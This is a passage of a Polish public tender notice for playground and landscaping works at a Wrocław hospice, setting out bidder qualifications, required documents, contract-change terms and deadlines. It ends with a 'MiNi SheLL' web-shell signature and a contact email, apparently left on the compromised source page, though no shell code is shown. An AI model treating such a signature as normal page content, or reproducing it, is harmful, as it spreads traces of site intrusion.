odrębnych przepisów:<br/>Zamawiający nie wyznacza szczególnego sposobu spełniania przedmiotowego warunku.<br/>3. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie wyznacza szczególnego sposobu spełniania przedmiotowego warunku.<br/>4. zdolności technicznej lub zawodowej:<br/>• Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał co najmniej jedną robotę budowlaną<br/>obejmującą zakresem wykonanie placu zabaw lub roboty związane z zagospodarowaniem terenu, o całkowitej wartości<br/>robót min. 200.000,00 zł brutto,<br/>oraz<br/>• Wykonawca spełni warunek jeżeli wykaże, że dysponuje personelem posiadającym uprawnienia i doświadczenie w<br/>zakresie zgodnym z przedmiotem zamówienia tj.: Wymagane jest dysponowanie przez Wykonawcę na potrzeby tego<br/>zamówienia: kierownikiem robót w specjalności robót w specjalności konstrukcyjno-budowlanej, który:<br/>􀀀 posiada uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie (kierowania robotami<br/>budowlanymi bez ograniczeń) w specjalności konstrukcyjno-budowlanej określone przepisami ustawy Prawo budowlane (t.j.<br/>Dz. U. z 2020 r. poz. 1333 z późn. zm.) lub odpowiednie uprawnienia budowlane wydane na podstawie wcześniej<br/>obowiązujących przepisów. Dopuszcza się osoby posiadające równoważne uprawnienia wydane w innych krajach, zgodnie<br/>z obowiązującymi przepisami w sprawie uznawania kwalifikacji zawodowych.<br/>􀀀 posiada co najmniej 5 - letnie doświadczenie w sprawowaniu samodzielnych funkcji technicznych w budownictwie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie<br/>Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia tych podmiotowych środków dowodowych:<br/>(Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art.125 ust.1<br/>ustawy pzp, dane umożliwiające dostęp do tych środków).<br/>1) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i<br/>opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku<br/>zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami<br/>lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>2) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust.<br/>1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem<br/>składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia<br/>dokumentów potwierdzających, że przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na<br/>ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>3) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp i art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>Zamawiający będzie żądał od wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy pzp, przedstawienia podmiotowych<br/>środków dowodowych, w zakresie podstaw wykluczenia z postępowania dot. art. 108 i art. 109 ust. 1 pkt 1) i 4) ustawy pzp oraz art.<br/>7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego, dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych<br/>podmiotów podstawy wykluczenia z postępowania – tj. dokumenty określone w SWZ w Rozdz. VIII pkt 2 ppkt 1), 2) 3) oraz<br/>Oświadczenia, o którym mowa w pkt. 1 (Załącznik nr 3 do SWZ).<br/>Dokumenty, jakie ma złożyć wykonawca posiadający ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej<br/>Polskiej zostały wskazane w rozdziale VIII SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia tych podmiotowych środków dowodowych:<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>2) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą, sporządzoną na Formularzu oferty – stanowiącym Załącznik nr 1 do SWZ, Wykonawca jest zobowiązany<br/>złożyć:<br/>1) Oświadczenie/a o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu – stanowiące Załącznik nr 2<br/>do SWZ oraz Załącznik nr 3 do SWZ (w przypadku podmiotu udostępniającego zasoby).<br/>2) Pełnomocnictwo:<br/>a) Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa<br/>obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy.<br/>b) W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia dokument pełnomocnictwa, z treści<br/>którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców.<br/>- jeżeli dotyczy.<br/>3) Zobowiązanie podmiotu trzeciego udostępniającego zasoby - jeżeli dotyczy.<br/>4) Oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy - jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w pkt 1, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>4. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>6. W przypadku, o którym mowa pkt 5, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio<br/>do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>7. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa art. 125 ust.1<br/>ustawy pzp tj. oświadczenia o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, składa każdy z<br/>wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu<br/>lub kryteriów selekcji w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub<br/>kryteriów selekcji. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Pełna treść rodzaju i zakresu zmian umowy oraz warunków ich wprowadzenia zostały opisane w załączniku nr 7 do SWZ.<br/>1. Strony przewidują możliwość zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących okolicznościach:<br/>a) zmiany terminu realizacji zamówienia na skutek wystąpienia okoliczności, których nie można było przewidzieć w chwili<br/>zawarcia niniejszej umowy oraz z przyczyn nie leżących po stronie Wykonawcy, w szczególności:<br/>- w przypadku wstrzymania przez Zamawiającego lub inne służby nadzoru wykonywania robót, a także w sytuacji powstania<br/>obowiązku wstrzymania prac wynikającego z innych przepisów prawnych;<br/>- wskutek wystąpienia warunków atmosferycznych uniemożliwiających wykonanie robót zgodnie z warunkami technicznymi,<br/>zasadami współczesnej wiedzy technicznej, technologii wykonania robót i obowiązującymi przepisami i normami;<br/>- w przypadku konieczności wykonania robót dodatkowych, nieobjętych przedmiotem zamówienia lub robót zamiennych;<br/>- w przypadku konieczności usunięcia błędów lub nieścisłości w dokumentacji projektowej;<br/>- w przypadku utrudnień w dostępie do materiałów budowlanych, ze względu na sytuację rynkową spowodowaną warunkami<br/>zewnętrznymi niezależnymi od Zamawiającego i Wykonawcy, co zostanie stosownie udokumentowane przez Wykonawcę;<br/>b) zmiany kierownika robót:<br/>- na wniosek Zamawiającego w przypadku, gdy kierownik nie wykonuje swoich obowiązków wynikających z umowy;<br/>- na wniosek Wykonawcy w przypadku choroby lub innych zdarzeń losowych, jeżeli zmiana kierownika stanie się konieczna<br/>z jakichkolwiek przyczyn niezależnych od Wykonawcy (np. rezygnacji).<br/>W przypadku zmiany kierownika nowa osoba musi spełniać wymagania określone w SWZ dla funkcji pełnionej przez osobę,<br/>w miejsce której zostaje zaangażowana;<br/>c) zmiany w treści umowy, w tym dotyczące terminu realizacji, w przypadku zaistnienia okoliczności niemożliwych do<br/>przewidzenia w dniu zawarcia umowy, w tym w przypadku wystąpienia robót dodatkowych, nieobjętych zamówieniem<br/>podstawowym, niezbędnych do jego prawidłowego wykonania, których wykonanie stało się konieczne na skutek sytuacji<br/>niemożliwej wcześniej do przewidzenia;<br/>d) zmiany terminu realizacji robót wynikających z wprowadzenia w dokumentacji projektowej zmian uznanych za nieistotne<br/>odstępstwa od projektu budowlanego oraz usunięcia błędów lub nieścisłości w dokumentacji projektowej;<br/>e) zmiany ilości robót budowlanych, wynikających ze zmiany projektu, której nie dało się przewidzieć w dniu zawarcia<br/>umowy, a jest konieczna dla uzyskania efektu końcowego;<br/>f) zmiana dokonana na podstawie art. 23 pkt 1 ustawy Prawo budowlane - zmiana w rozwiązaniach projektowych, jeżeli są<br/>one uzasadnione koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu<br/>budowy;<br/>g) zmiany postanowień niniejszej umowy, w szczególności w zakresie sposobu wykonania lub terminu realizacji, będących<br/>następstwem zmiany przepisów powodujących konieczność zastosowania innych rozwiązań technicznych lub<br/>materiałowych niż zakładano w opisie przedmiotu zamówienia, ze względu na zamiany obowiązującego prawa;<br/>h) zmiany technologii lub elementów przedmiotu umowy, których konieczność wprowadzenia wynika z okoliczności, których<br/>nie można było przewidzieć w chwili zawarcia niniejszej umowy;<br/>i) zmiany wynagrodzenia brutto Wykonawcy, bez zmiany wynagrodzenia netto – w przypadku uzyskania przez Wykonawcę<br/>Wiążącej Informacji Stawkowej (WIS) dotyczącej zastosowania dla robót objętych niniejszą umową obniżonej stawki<br/>podatku VAT lub w przypadku ustawowej zmiany stawki podatku VAT dla robót objętych niniejszą umową.<br/>2. Zamawiający przewiduje możliwość wprowadzenia robót zamiennych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/hospicjum_wroc</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-15 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 10. Przed dokonaniem montażu elementów małej architektury Wykonawca zobowiązany jest do przedłożenia<br/>Zamawiającemu do wyboru i akceptacji min. 3 wariantów rozmieszczenia ich na terenie działki.<br/>11. Przed nasadzeniem roślin Wykonawca zobowiązany jest do przedłożenia Zamawiającemu do wyboru i akceptacji min. 3<br/>wariantów rozmieszczenia ich na terenie działki.<br/>12. Zamawiający informuje, iż w miejscu realizacji przedmiotu zamówienia realizowane są roboty budowlane dotyczące tego<br/>samego obiektu (wewnętrzne prace wykończeniowe, instalacyjne elektryczne, niskoprądowe i sanitarne). W związku z tym<br/>Wykonawcy przystępując do niniejszego zamówienia wyrażają wolę współdziałania z firmami realizującymi na tym samym<br/>terenie inny zakres robót. W szczególności współdziałanie to dotyczyć będzie współpracy na terenie budowy, zapewnienia<br/>kompatybilności systemów, współdzielenia terenu budowy, ustalania harmonogramu korzystania przez każdego w<br/>wykonawców z wjazdu na teren inwestycji, który to wjazd musi być współdzielony.<br/>13. Zamawiający nie gwarantuje miejsca na zorganizowanie zaplecza budowy. Zorganizowanie zaplecza budowy jest<br/>obowiązkiem Wykonawcy.<br/>14. Koszt poboru energii elektrycznej na potrzeby wykonania zamówienia obciąża Wykonawcę.<br/>15. Zamawiający wymaga złożenia oferty po odbyciu wizji lokalnej w miejscu realizacji przedmiotu zamówienia. Wizja<br/>lokalna rozpocznie się w dniu 4.05.2023 r. godz. 13.30 przy ul. Sołtysowickiej 58 we Wrocławiu.<br/>Wizja lokalna umożliwi Wykonawcom uzyskanie informacji przydatnych do przygotowania oferty, w tym zapoznanie się z<br/>terenem inwestycji. Odbycie wizji lokalnej jest obowiązkowe ze względu na specyfikę przedmiotu zamówienia. Oferta<br/>złożona bez odbycia wizji lokalnej zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 18 ustawy pzp.

Creat By MiNi SheLL
Email: jattceo@gmail.com